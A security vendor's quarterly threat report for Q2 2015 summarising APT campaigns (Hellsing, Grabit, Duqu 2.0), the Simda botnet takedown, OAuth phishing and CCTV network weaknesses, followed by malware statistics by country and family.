While researching Naikon, we uncovered the activities of the Hellsing APT group. This group focused mainly on government and diplomatic organisations in Asia – most victims are located in Malaysia and the Philippines, although we have also seen victims in India, Indonesia and the US.

IT threat evolution Q2 2015

In itself, Hellsing is a small and technically unremarkable cyber-espionage group (around 20 organisations have been targeted by Hellsing). What makes it interesting is that the group found itself on the receiving end of a spear-phishing attack by the Naikon APT group – and decided to strike back! The target of the email questioned the authenticity of the email with the sender. They subsequently received a response from the attacker, but didn’t open the attachment. Instead, shortly afterwards they sent an email back to the attackers that contained their own malware. It’s clear that, having detected that they were being targeted, the Hellsing group was intent on identifying the attackers and gathering intelligence on their activities.

Hellsing found itself on under a spear-phishing attack by the Naikon APT group – and struck back #KLReport
In the past, we’ve seen APT groups accidentally treading on each other’s toes – for example, stealing address books from victims and then mass-mailing everyone on each of the lists. But an ATP-on-APT attack is unusual.

Grabit and run

Many targeted attack campaigns focus on large enterprises, government agencies and other high-profile organisations. So it’s easy to read the headlines and imagine that such organisations are the only ones on the radar of the attackers. However, one of the campaigns we reported last quarter showed clearly that it’s not only ‘big fish’ that attackers are interested in. Every business is a potential target – for its own assets, or as a way of infiltrating another organisation.

The Grabit cyber-espionage campaign is designed to steal data from small- and medium-sized organisations – mainly based in Thailand, Vietnam and India, although we have also seen victims in the US, UAE, Turkey, Russia, China, Germany and elsewhere. The targeted sectors include chemicals, nanotechnology, education, agriculture, media and construction. We estimate that the group behind the attacks has been able to steal around 10,000 files.

The malware is delivered in the form of a Word document attached to an email. The document contains a malicious macro named ‘AutoOpen’. This macro opens a socket over TCP and sends an HTTP request to a remote server that was hacked by the group to serve as a malware hub. Then the program used to carry out the spying operation is downloaded from this server. In some cases, the macro is password protected (the attackers seem to have forgotten that a DOC file is actually an archive; and when it’s opened in an editor, macro strings are shown in clear-text). The attackers control compromised computers using a commercial spying tool called HawkEye (from HawkEyeProducts). In addition, they use a number of Remote Administration Tools (RATs).

The attackers have implemented some techniques designed to make Grabit hard to analyze,, including variable code sizes, code obfuscation and encryption. On the other hand, they fail to cover their tracks in the system. The result is a ‘weak knight in heavy armor’, suggesting that the attackers didn’t write all the code themselves.

The return of Duqu

In spring 2015, during a security sweep, Kaspersky Lab detected a cyber-intrusion affecting several internal systems. The full-scale investigation that followed uncovered the development of a new malware platform from one of the most skilled, mysterious and powerful groups in the APT world – Duqu, sometimes referred to as the step-brother of Stuxnet. We named this new platform ‘Duqu 2.0′.

The malware platform was designed to survive almost exclusively in the memory of infected systems. #KLReport
In the case of Kaspersky Lab, the attack took advantage of a zero-day vulnerability in the Windows kernel (patched by Microsoft on 9 June 2015) and possibly up to two others (now patched) that were also zero-day vulnerabilities at the time. The main goal of the attackers was to spy on Kaspersky Lab technologies, ongoing research and internal processes.

However, Kaspersky Lab was not the only target. Some Duqu 2.0 infections were linked to the P5+1 events related to negotiations with Iran about a nuclear deal. The attackers appear to have launched attacks at the venues for some of these high-level talks. In addition, the group launched a similar attack related to the 70th anniversary event of the liberation of Auschwitz-Birkenau.

One of Duqu 2.0’s most notable features was its lack of persistence, leaving almost no traces in the system. The malware made no changes to the disk or system settings: the malware platform was designed in such a way that it survives almost exclusively in the memory of infected systems. This suggests that he attackers were confident that they could maintain their presence in the system even if an individual victim’s computer was re-booted and the malware was cleared from memory.

The Duqu 2.0 technical paper and analysis of the persistence module can be found on our web site.

Malware stories

Simda’s hide-and-seek malware business

In April, Kaspersky Lab was involved in the take-down of the Simda botnet, co-ordinated by the Interpol Global Complex for Innovation. The investigation was started by Microsoft and expanded to other participants, including Trend Micro, the Cyber Defense Institute, officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI, the Police Grand-Ducale Section Nouvelles Technologies in Luxembourg, and the Russian Ministry of the Interior’s Cybercrime Department “K” supported by the INTERPOL National Central Bureau in Moscow.

As a result of the operation, 14 servers in the Netherlands, the US, Luxembourg, Poland and Russia were taken down. Preliminary analysis of some of the sink-holed server logs revealed 190 countries that had been affected by the botnet.

Preliminary analysis revealed 190 countries that had been affected by the Simda botnet. #KLReport
The bots are distributed via a series of infected web sites that re-direct visitors to exploit kits. The bots download and run additional components from their own update servers and are able to modify the hosts file on the infected computer: in this way, once-infected computers can keep sending out HTTP requests to the malicious servers, indicating that they are still vulnerable to re-infection using the same exploit kits.

Although the Simda botnet is relatively large, with an estimated 770,000 infected computers, the authors went to great lengths to try and make it ‘fly under the radar’ of anti-malware systems. The malware is able to detect emulation, security tools and virtual machines; it uses a number of methods to detect research sandbox environments with a view to tricking researchers by consuming all CPU resources or notifying the botnet owner about the external IP address of the research network; and it implements server-side polymorphism.

Simda also de-activates itself after a short time. This is closely related to the purpose of this particular botnet: it’s a delivery mechanism, designed to disseminate potentially unwanted and malicious software. The distributors wanted to guarantee that only their client’s malware would be installed on infected computers.

Kaspersky Lab products currently detect hundreds of thousands of modifications of Simda, together with many different third-party malicious programs distributed using the Simda botnet. You can use our free Simda bot IP scanner to check if your IP has connected to a Simda C2 server in the past.

Phishing, but not as we know it

Early in 2014 a serious vulnerability in the OAuth and OpenID protocols was discovered by Wang Jing, a PHD student at the Nanyang Technological University in Singapore. He found what he named the ‘covert redirect’ vulnerability, which could allow an attacker to steal data following authentication (a summary of the problem, including a link to Jing’s blog, can be found on Threatpost).

Recently, we discovered a phishing campaign that takes advantage of the OAuth vulnerability. OAuth lets customers of online services give third parties limited access to their protected resources without sharing their credentials. It is commonly used by applications for social networks – for example, to obtain access to someone’s contact lists or other data.

The Kaspersky Lab customer who reported the attack received an email saying that someone had used their Windows Live ID and asking them to follow a link to the Windows Live site and follow the security requirements outlined there.

Do not allow untrusted applications to access your data #KLReport
On the face of it, it seems like a standard phishing technique – one that would result in the victim being re-directed to a fake site. But in this case, the link led to the legitimate site. The victim’s login credentials aren’t stolen and they are logged in to the legitimate site. However, after authorization, the victim receives a request for a range of permissions from an unknown application. This can include automatic login, access to profile information, contact list and email addresses. If the victims hands over these rights, it offers the cybercriminals access to their personal information – information that they can use to distribute spam, phishing links or for other fraudulent purposes.

We would recommend the following to safeguard your personal data.

Do not click on links you receive by email or in messages on social networks.
Do not allow untrusted applications to access your data.
Before you agree to such requests, carefully read the description of the access rights being requested by an application
Read reviews and feedback on the application on the Internet.
Review the rights of currently installed applications and modify the settings if you need to.
Smart cities but not-so-smart security

The use of CCTV systems by governments and law enforcement agencies for surveilling public places has grown enormously in recent years. Most of us accept them as a reasonable trade-off between privacy and security. However, this rather assumes that the data gathered using this technology will be handled securely and responsibly, to ensure that the benefits aren’t outweighed by any potential dangers.

Many CCTV cameras have a wireless connection to the Internet, enabling police to monitor them remotely. However, this is not necessarily secure: it’s possible for cybercriminals to passively monitor security camera feeds, to inject code into the network – thereby replacing a camera feed with fake footage – or to take systems offline. Two security researchers (Vasilios Hioureas from Kaspersky Lab and Thomas Kinsey from Exigent Systems) recently conducted research into the potential security weaknesses in CCTV systems in one city. You can read Vasilios’s report on our web site).

Aspects of life are being made digital & security should be considered as part of the design stage #KLReport
The researchers started by looking at the surveillance equipment in locations across the city. Unfortunately, there had been no attempt to mask the branding of the cameras, so it was easy to determine the makes and models of the cameras, examine the relevant specs and create their own scale model in the lab. The equipment being used provided effective security controls, but these controls were not being implemented. Data packets passing across the mesh network were not being encrypted, so that an attacker would be able to create their own version of the software and manipulate data travelling across it.

It’s important to note that they did not attempt to hack into the real network, but analyzed the hardware and communication protocols and built a scale model. The network topology of the surveillance camera network is unlike a standard home wireless network. On a home network, all devices connect to the Internet and one another through a router. Any device connected to that router could potentially trick the other devices into thinking it’s the router and monitor or change data by performing a Man-in-the-Middle attack.

IT threat evolution Q2 2015

IT threat evolution Q2 2015

The surveillance camera network is more complicated, because of the distances the data needs to travel. The data must travel from any given camera through a series of nodes eventually leading back to a hub (in a real world implementation, this might be a police station). The traffic follows the path of least resistance where each node has the ability to communicate with several others and selects the easiest path back to the hub.

IT threat evolution Q2 2015

Hioureas and Kinsey built a series of fake nodes that purported to offer a direct line of communication to a simulated police station. Since they knew all the protocols used on the network, they were able to create a Man-in-the-Middle node that seemed to offer the path of least resistance, causing the real nodes to relay their traffic through their malicious node.

One potential use for attackers would be to spoof footage sent to a police station. This could make it appear as if there was an incident in one location, thereby distracting police from a real attack occurring elsewhere in the city.

The researchers reported these issues to the authorities responsible for the city surveillance systems concerned and they are in the process of fixing the security problems. In general, it’s important that WPA encryption, protected by a strong password, is implemented in these networks; that labelling is removed from hardware, to make it harder for would-be attackers to find out how the equipment operates; and that footage is encrypted as it travels through the network.

The wider issue here is that more and more aspects of everyday life are being made digital: if security isn’t considered as part of the design stage, the potential dangers could be far-reaching – and retro-fitting security might not be straightforward. The Securing Smart Cities initiative, supported by Kaspersky Lab, is designed to help those responsible for developing smart cities to do so with cyber-security in mind.

Statistics

All the statistics used in this report were obtained using the Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Mobile threats

Mobile banker Trojans still remain among the top mobile threats. In our Q1 2015 report, we mentioned Trojan-SMS.AndroidOS.OpFake.cc, which could attack at least 29 banking and financial applications. The latest version of this Trojan can now attack 114 banking and financial applications. Its main goal is to steal the user’s online credentials. Serving the same purpose, it also attacks several popular email applications.

Trojan-Spy.AndroidOS.SmsThief.fc also deserves a mention. Cybercriminals managed to add their code into the original banking application without affecting its operation, making this Trojan more difficult to detect.

The latest version of Trojan-SMS.AndroidOS.Opfake.cc can now attack 114 banking and financial applications. #KLReport
A new iOS Trojan, Trojan.IphoneOS.FakeTimer.a, emerged in Q2. It is interesting in that it is an iOS version of a malicious Android app which emerged several years ago. FakeTimer.a attacks even non-jailbroken devices. Its payload is rather primitive: it is a regular phishing application created to steal money from Japanese users.

In Q2, Trojans which can use root privileges to display advertisements to users or install advertising applications became especially visible. A total of six such malicious programs landed in the Q2 TOP 20 of malicious malware.

The number of new mobile threats

In Q2 2015, Kaspersky Lab mobile security products detected 291,887 new malicious mobile programs, a 2.8-fold increase on Q1 2015.

Kaspersky Lab mobile security products detected 291,887 new malicious mobile programs #KLReport
The number of installation packages detected was 1,048,129 – this is seven times as many as in the previous quarter.

IT threat evolution Q2 2015

Number of malicious installation packages and new malicious mobile programs detected (Q4 2014 – Q2 2015)

Distribution of mobile malware by type

IT threat evolution Q2 2015

Distribution of new mobile malware by type, Q2 2015

The ranking of malware objects for mobile devices for the second quarter of 2015 was headed by RiskTool (44.6%). These are legitimate applications that are potentially dangerous for users – if used carelessly or manipulated by a cybercriminal, they could lead to financial losses.

Potentially unwanted advertising apps came second with 19%.

SMS Trojans have previously led this ranking, but in Q2 they were only in the fourth place with 8.1% – this is 12.9% lower than in Q1. The lower share taken by these malicious programs is in part accounted for by the fact that those who were previously active distributing SMS Trojans have started using ‘cleaner’ monetization techniques (as testified by the increased RiskTool shares), or prefer to use other types of malware. Thus the Trojan share increased from 9.8% in Q1 to 12.4% in Q2.

Top 20 malicious mobile programs

Please note that, starting from this quarterly report, we are publishing the ranking of malicious programs, which does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Name % of attacks *
1 DangerousObject.Multi.Generic 17.5%
2 Trojan-SMS.AndroidOS.Podec.a 9.7%
3 Trojan-SMS.AndroidOS.Opfake.a 8.0%
4 Backdoor.AndroidOS.Obad.f 7.3%
5 Trojan-Downloader.AndroidOS.Leech.a 7.2%
6 Exploit.AndroidOS.Lotoor.be 5.7%
7 Trojan-Spy.AndroidOS.Agent.el 5.5%
8 Trojan.AndroidOS.Ztorg.a 3.1%
9 Trojan.AndroidOS.Rootnik.a 3.0%
10 Trojan-Dropper.AndroidOS.Gorpo.a 2.9%
11 Trojan.AndroidOS.Fadeb.a 2.7%
12 Trojan-SMS.AndroidOS.Gudex.e 2.5%
13 Trojan-SMS.AndroidOS.Stealer.a 2.5%
14 Exploit.AndroidOS.Lotoor.a 2.1%
15 Trojan-SMS.AndroidOS.Opfake.bo 1.6%
16 Trojan.AndroidOS.Ztorg.b 1.6%
17 Trojan.AndroidOS.Mobtes.b 1.6%
18 Trojan-SMS.AndroidOS.FakeInst.fz 1.6%
19 Trojan.AndroidOS.Ztorg.pac 1.5%
20 Trojan-SMS.AndroidOS.FakeInst.hb 1.4%
* Percentage of users attacked by the malware in question, relative to all users attacked

The top position in the rankings was occupied by DangerousObject.Multi.Generic (17.5%). This is how new malicious applications are detected by the KSN cloud technologies, which help our products to significantly shorten the response time to new and unknown threats.

Trojan-SMS.AndroidOS.Podec.a (9.7%) has been among the Top Three malicious mobile programs for three quarters in a row due to its active dissemination.

Trojan-SMS.AndroidOS.Opfake.a (8.0%) has been quickly rising to the top lines of the ranking. While in Q3 2014 it was in the 11th place only,it is now in the TOP 3 of mobile malware. Obfake.bo, another representative of this malware family, is in 15th place.

It is also worth mentioning the appearance of Backdoor.AndroidOS.Obad in the TOP 20 ranking – in fact, it jumped to fourth place all at once. This is a multi-functional Trojan, capable of sending SMS to premium-rate numbers; downloading other malware programs, installing them on the infected device and/or sending them further via Bluetooth; and remotely performing commands in the console. We wrote about it two years ago, and its capabilities have remained virtually unchanged ever since.

Another interesting thing is that although this ranking does not include adware programs, six of the TOP 20 malicious mobile programs use advertisements as the main vehicle of monetization. Unlike regular advertisement modules, Trojan.AndroidOS.Rootnik.a, three programs of the Trojan.AndroidOS.Ztorg family, Trojan-Downloader.AndroidOS.Leech.a and Trojan.AndroidOS.Fadeb.a do not carry any productive payload with them. Their goal is to deliver to the user as much advertising as possible in various ways, including installation of new adware programs. These Trojans can use root privileges to conceal themselves in the system folder – this makes it very difficult to delete them.

Mobile banker Trojans

In Q2 2015, we detected 630 mobile banker Trojans. It should be noted that the number of new malware programs belonging to this category is now growing at a much slower rate.

IT threat evolution Q2 2015

Number of mobile banker Trojans detected by Kaspersky Lab’s solutions (Q3 2014 – Q2 2015)

IT threat evolution Q2 2015

Geography of mobile banking threats in Q2 2015
(number of users attacked)

The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we made a country ranking according to the percentage of users attacked by mobile banker Trojans.

Top 10 counties attacked by mobile banker Trojans (ranked by percentage of users attacked):

Country* % of users attacked by mobile bankers**
1 Republic of Korea 2.37%
2 Russia 0.87%
3 Uzbekistan 0.36%
4 Belarus 0.30%
5 Ukraine 0.29%
6 China 0.25%
7 Kazakhstan 0.17%
8 Australia 0.14%
9 Sweden 0.13%
10 Austria 0.12%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country

Mobile bankers proliferate most actively in Korea. Cybercriminals are also historically active in Russia and other post-Soviet countries. It is some of these countries that occupy four out of five positions in the ranking.

An indication of how popular mobile banker Trojans are with cybercriminals in each country, may be provided by the percentage of users who were attacked at least once by mobile banker Trojans during the reported three month period, relative to all users in the same country whose mobile security product was activated at least once in the reporting period. This ranking is different from the one above:

TOP 10 countries by the percentage of users attacked by mobile bankers relative to all attacked users

Country * % of users attacked by mobile bankers, relative to all attacked users *
1 Republic of Korea 31.72%
2 Russia 10.35%
3 Australia 6.62%
4 Austria 6.03%
5 Japan 4.73%
6 Uzbekistan 4.17%
7 Belarus 3.72%
8 Ecuador 3.50%
9 Ukraine 3.46%
10 Switzerland 3.09%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all unique users attacked by mobile malware in the country

In Korea, almost one third of all users attacked by mobile malware were attacked by mobile bankers in particular. In Russia, every tenth attacked user came under a mobile banker attack. In other countries, this percentage is lower. Interestingly, there are four countries in this TOP 10 which are also in the TOP 5 of most secure counties with the lowest probability of mobile malware infection – these are Australia, Austria, Japan and Switzerland.

The geography of mobile threats

IT threat evolution Q2 2015

The geography of mobile malware infection attempts in Q2 2015
(percentage of all users attacked)

Top 10 countries attacked by mobile malware:

Country* % of users attacked**
1 China 16.34%
2 Malaysia 12.65%
3 Nigeria 11.48%
4 Bangladesh 10.89%
5 Tanzania 9.66%
6 Algeria 9.33%
7 Uzbekistan 8.56%
8 Russia 8.51%
9 Ukraine 8.39%
10 Belarus 8.05%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country

This ranking is led by China, where 16.34% of all users of Kaspersky Lab’s product were attacked at least once during the three month period. Malaysia is in second place with 12.65%. Russia (8.51%), Ukraine (8.39%) and Belarus (8.05%) close the TOP 10 ranking, below some Asian and African countries.

Korea took 11th place in this ranking with 7.46%. Let us remind the reader that mobile banker Trojans are very popular with the Korean cybercriminals: 31.72% of all users attacked by mobile malware were the victim of a mobile banking Trojan attack.

The most secure countries in this respect are:

Country % of users attacked
1 Japan 1.06%
2 Canada 1.82%
3 Austria 1.96%
4 Australia 2.16%
5 Switzerland 2.19%
Vulnerable applications used by fraudsters

The ranking of vulnerable applications below is based on information about the exploits blocked by our products. These exploits were used by cybercriminals in Internet attacks and in attempts to compromise local applications, including those installed on mobile devices.

IT threat evolution Q2 2015

Distribution of exploits used in attacks by type of application attacked, Q2 2015

The rating of exploits has seen little change from the first quarter. The Browsers category (60%) maintained its top position in the Q2 2015. Currently most exploit packs contain a pack of exploits for Adobe Flash Player and Internet Explorer. It is worth mentioning the growing number of exploits for Adobe Flash Player (up by six percentage points) which is caused by the large number of spam mass mailings containing malicious PDF documents.

The number of exploits for Java continues to decrease (down four percentage points): in Q2 we did not see any new exploits for Java.

In the second quarter of 2015 we registered the use of four new vulnerabilities in Adobe Flash Player:

CVE-2015-3113
CVE-2015-3104
CVE-2015-3105
CVE-2015-3090
Although the share of exploits for Adobe Flash Player in our rating is only 3%, there are many more of them in the “wild”. When considering these statistics, we should take into account that Kaspersky Lab technologies detect exploits at various stages. The Browsers category also includes detection of landing pages that “distribute” exploits. According to our observations, they are most often exploits for Adobe Flash Player

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

Online threats in the banking sector

In the second quarter of 2015, Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on the computers of 755,642 users. This figure represents an 18.7% decrease compared to the previous quarter (735,428).

There were 5,903,377 registered notifications about attempted financial malware infections #KLReport
A total of 5,903,377 notifications of malicious activity by programs designed to steal money via online access to bank accounts were registered by Kaspersky Lab security solutions in Q2 2015.

IT threat evolution Q2 2015

Number of attacks by financial malware, Q2 2015

Geography of attacks

In the second quarter of 2015, we changed the methodology used to create the rating of countries affected by the malicious activity of banking Trojans. In our previous reports, the Top 10 was made using the number of users attacked. Although this aspect is very important, it depends on the number Kaspersky Lab product users in the countries.

To evaluate and compare the degree of risk of being infected by banking Trojans which user computers are exposed to worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this threat during the reporting period in the country, of all users of our products in this county.

IT threat evolution Q2 2015

Geography of banking malware attacks in Q2 2015 (the percentage of users attacked)

Top 10 countries by the percentage of users attacked

Country* % of users attacked **
1 Singapore 5.28%
2 Switzerland 4.16%
3 Brazil 4.07%
4 Australia 3.95%
5 Hong Kong 3.66%
6 Turkey 3.64%
7 New Zealand 3.28%
8 South Africa 3.13%
9 Lebanon 3.10%
10 UAE 3.04%
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000)
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country

In Q2 2015, Singapore took the lead in the percentage of Kaspersky Lab users attacked by banking Trojans. Noticeably, most countries in the TOP 10 have a high level of technological and banking system development, which draws the attention of cybercriminals.

In Russia, 0.75% users encountered banking Trojans at least once during the quarter, in the US – 0.89%, in Spain – 2.02%, in the UK – 1.58%, in Italy – 1.57% , in Germany – 1.16%.

The TOP 10 banking malware families

The table below shows the Top 10 malicious programs most commonly used in Q2 of 2015 to attack online banking users, based on the number of users attacked:

Name Number of notifications Number of users attacked
1 Trojan-Downloader.Win32.Upatre 3888061 419940
2 Trojan-Spy.Win32.Zbot 889737 177665
3 Trojan-Banker.Win32.ChePro 264534 68467
4 Backdoor.Win32.Caphaw 72128 25923
5 Trojan-Banker.Win32.Banbra 56755 24964
6 Trojan.Win32.Tinba 175729 22942
7 Trojan-Banker.AndroidOS.Marcher 60819 19782
8 Trojan-Banker.AndroidOS.Faketoken 43848 13446
9 Trojan-Banker.Win32.Banker 23225 9209
10 Trojan-Banker.Win32.Agent 28658 8713
The majority of the Top 10 malicious programs work by injecting random HTML code in the web page displayed by the browser and intercepting any payment data entered by the user in the original or inserted web forms.

The Top 3 banking malicious programs remain unchanged from the previous quarter. Trojan-Downloader.Win32.Upatre kept its leading position in the rating. Malicious programs in this family are relatively simple and no larger than 3.5 KB. They usually download a Trojan-Banker belonging to a family known as Dyre/Dyzap/Dyreza. The list of financial institutions attacked by the banker Trojan depends on the configuration file that is downloaded from the Command-and-Control center.

In Q2 2015, the new banking Trojans entered the rating – Backdoor.Win32.Caphaw, Trojan-Banker.AndroidOS.Marcher and Trojan-Banker.AndroidOS.Faketoken.

Backdoor.Win32.Caphaw was first detected in 2011. It utilizes the Man-in-the-Browser technique to steal online banking credentials of the customers.

Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Marcher attack Android-based mobile devices. Faketoken works in partnership with computer Trojans. To distribute this malware, cybercriminals use social engineering techniques. When a user visits his online banking account, the Trojan modifies the page, asking him to download an Android application which is allegedly required to securely confirm the transaction. In fact the link leads to the Faketoken application.

Once Faketoken is on the user’s smartphone, the cybercriminals gain access to the user’s banking account via the computer infected with a banking Trojan and the compromised mobile device allows them to intercept the one-time confirmation code (mTAN). The second mobile Trojan is Trojan-Banker.AndroidOS.Marcher. After infecting a device, the malware tracks the launch of just two apps – the mobile banking customer of one of the European banks and Google Play. If the user starts Google Play, Marcher displays a false window requesting credit card data which then go to the fraudsters. The same method is used by the Trojan if the user starts the banking application.

Financial threats

Financial threats are not limited to banker malware that attacks online banking customers.

IT threat evolution Q2 2015

Financial malware: distribution by malware type

In Q2 2015, the proportion of banking malware increased from 71% to 83% compared with the previous quarter. The second most widespread financial threat was Bitcoin miners – malicious software that uses computing resources of the victim’s computer to generate bitcoins. In the previous quarter, this category of malware was in third place. Of note is the fact that some legitimate software developers secretly integrate Bitcoin-miners in their applications.

Top 20 malicious objects detected online

In the second quarter of 2015, Kaspersky Lab’s web antivirus detected 26,084,253 unique malicious objects: scripts, exploits, executable files, etc.

Kaspersky Lab detected and repelled a total of 379,972,834 malicious attacks from online resources #KLReport
We identified the 20 most active malicious objects involved in online attacks against users’ computers. These 20 accounted for 96.5% of all attacks on the Internet.

Top 20 malicious objects detected online

Name* % of all attacks**
1 AdWare.JS.Agent.bg 47.66%
2 Malicious URL 32.11%
3 Trojan.Script.Generic 4.34%
4 AdWare.Script.Generic 4.12%
5 Trojan.Script.Iframer 3.99%
6 AdWare.JS.Agent.bt 0.74%
7 Exploit.Script.Blocker 0.56%
8 Trojan.Win32.Generic 0.49%
9 AdWare.AndroidOS.Xynyin.a 0.49%
10 Trojan-Downloader.Win32.Generic 0.37%
11 Trojan-Ransom.JS.Blocker.a 0.34%
12 Trojan-Clicker.JS.Agent.pq 0.23%
13 AdWare.JS.Agent.an 0.20%
14 AdWare.JS.Agent.by 0.19%
15 Trojan.Win32.Invader 0.12%
16 Trojan-Downloader.Win32.Genome.qhcr 0.11%
17 AdWare.Win32.Amonetize.ague 0.11%
18 AdWare.Win32.MultiPlug.nnnn 0.10%
19 AdWare.NSIS.Agent.cv 0.09%
20 Trojan-Downloader.Script.Generic 0.09%
* These statistics represent the detection verdicts of the web antivirus module. Information was provided by users of Kaspersky Lab products who consented to share their local statistical data.
** The percentage of all web attacks recorded on the computers of unique users.

The Top 20 is largely made up of verdicts assigned to objects used in drive-by attacks, as well as adware programs.

Aggressive distribution of advertising programs affected the rating: 10 out of 20 positions were occupied by advert-related objects. In first place is the script AdWare.JS.Agent.bg which is implemented by inserting adware in arbitrary web pages. It could even push down Malicious URL, the verdict we use for the links from the black list which are ranked second in Q2 2015.

Of interest is the appearance of the AdWare.AndroidOS.Xynyin.a verdict – it’s unusual to see a verdict for Android malware in the rankings for malware on users’ computers. The program corresponding to this verdict is an advertising module for Android which is embedded in different applications (for example, in programs “accelerating” the work of the phone). One such application was popular in March and April of this year when it was actively downloaded by users. Since Google Play does not provide such applications these applications were downloaded from the Internet mostly via the victims’ computers.

The Trojan-Ransom.JS.Blocker.a verdict is a script which tries to block the browser using a periodic page update and displays the message asking the victim to pay a “fine” to the specified e-wallet for viewing inappropriate material. The script is mostly encountered on porn sites.

Top 10 countries where online resources are seeded with malware

The following stats are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched up against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2015, Kaspersky Lab solutions blocked 379,972,834 attacks launched from web resources located in various countries around the world. 89% of notifications on blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

IT threat evolution Q2 2015

Distribution of web attack sources by country, Q2 2015

Russia (51%) maintained its leadership: this country’s share increased by 11.27%. Switzerland left the Top 10. Singapore came eighth in the ranking with 1.56% of all web attacks.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculate the percentage of Kaspersky Lab users in each country who encounter detection verdicts on their machines during the quarter. The resulting data provide an indication of the aggressiveness of the environment in which computers work in different countries.

Country* % unique users attacked**
1 Russia 38.98%
2 Kazakhstan 37.70%
3 Ukraine 35.75%
4 Syria 34.36%
5 Belarus 33.02%
6 Azerbaijan 32.16%
7 Thailand 31.56%
8 Georgia 31.44%
9 Moldova 31.09%
10 Vietnam 30.83%
11 Armenia 30.19%
12 Kyrgyzstan 29.32%
13 Croatia 29.16%
14 Algeria 28.85%
15 Qatar 28.47%
16 China 27.70%
17 Mongolia 27.27%
18 Makedonia 26.67%
19 Bosnia and Herzegovina 25.86%
20 Greece 25.78%
These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In Q2 2015, Russia, which was second in the first quarter, regained its top position in the ranking. Since the previous quarter, UAE, Latvia, Tajikistan, Tunisia and Bulgaria have left the Top 20. The newcomers to the rankings were Syria, which rocketed to fourth place (34.36%); Thailand, which was in seventh place (31.56%); Vietnam, in tenth place (30.83%); China (27.70%) and Macedonia (26.67%), which occupied 16th and 18th places respectively.

23.9% of computers connected to the Internet globally were subjected to at least 1 web attack in Q2 #KLReport
The countries with the safest online surfing environments included Argentina (13.2%), the Netherlands (12.5%), Korea (12.4%), Sweden (11.8%), Paraguay (10.2%) and Denmark (10.1%).

IT threat evolution Q2 2015

On average, 23.9% of computers connected to the Internet globally were subjected to at least one web attack during the three months.

Local threats

Local infection statistics for users computers are a very important indicator: they reflect threats that have penetrated computer systems using means other than the Internet, email, or network ports.

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q2 2015, Kaspersky Lab’s file antivirus modules detected 110,731,713 unique malicious and potentially unwanted objects.

Top 20 malicious objects detected on users computers

Name* % unique users attacked**
1 DangerousObject.Multi.Generic 22.64%
2 Trojan.Win32.Generic 15.05%
3 Trojan.WinLNK.StartPage.gena 8.28%
4 AdWare.Script.Generic 7.41%
5 Adware.NSIS.ConvertAd.heur 5.57%
6 WebToolbar.Win32.Agent.azm 4.48%
7 WebToolbar.JS.Condonit.a 4.42%
8 Trojan-Downloader.Win32.Generic 3.65%
9 Downloader.Win32.MediaGet.elo 3.39%
10 Trojan.Win32.AutoRun.gen 3.29%
11 Downloader.Win32.Agent.bxib 3.26%
12 WebToolbar.JS.CroRi.b 3.09%
13 RiskTool.Win32.BackupMyPC.a 3.07%
14 Virus.Win32.Sality.gen 2.86%
15 Worm.VBS.Dinihou.r 2.84%
16 WebToolbar.Win32.MyWebSearch.si 2.83%
17 DangerousPattern.Multi.Generic 2.75%
18 AdWare.NSIS.Zaitu.heur 2.70%
19 AdWare.BAT.Clicker.af 2.67%
20 AdWare.Win32.MultiPlug.heur 2.54%
* These statistics are compiled from malware detection verdicts generated by the on-access and on-demand scanner modules on the computers of those users running Kaspersky Lab products who have consented to submit their statistical data.
** The proportion of individual users on whose computers the antivirus module detected these objects as a percentage of all individual users of Kaspersky Lab products on whose computers a file antivirus detection was triggered.

In line with the established practice, this ranking represents the verdicts assigned to adware programs or their components (such as AdWare.BAT.Clicker.af), and to worms distributed on removable drives.

The only virus in the rankings – Virus.Win32.Sality.gen – continues to lose ground. The proportion of user machines infected by this virus has been diminishing for a long time. In Q2 2015, Sality was in 14th place with 2.86%, a 0.32% decrease compared to the previous quarter.

Countries where users faced the highest risk of local infection

For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

Top 20 countries with the highest levels of computer infection

Country* % unique users**
1 Bangladesh 60.53%
2 Vietnam 59.77%
3 Pakistan 58.79%
4 Mongolia 58.59%
5 Georgia 57.86%
6 Somali 57.22%
7 Nepal 55.90%
8 Afghanistan 55.62%
9 Algeria 55.44%
10 Armenia 55.39%
11 Russia 54.94%
12 Laos 54.77%
13 Iraq 54.64%
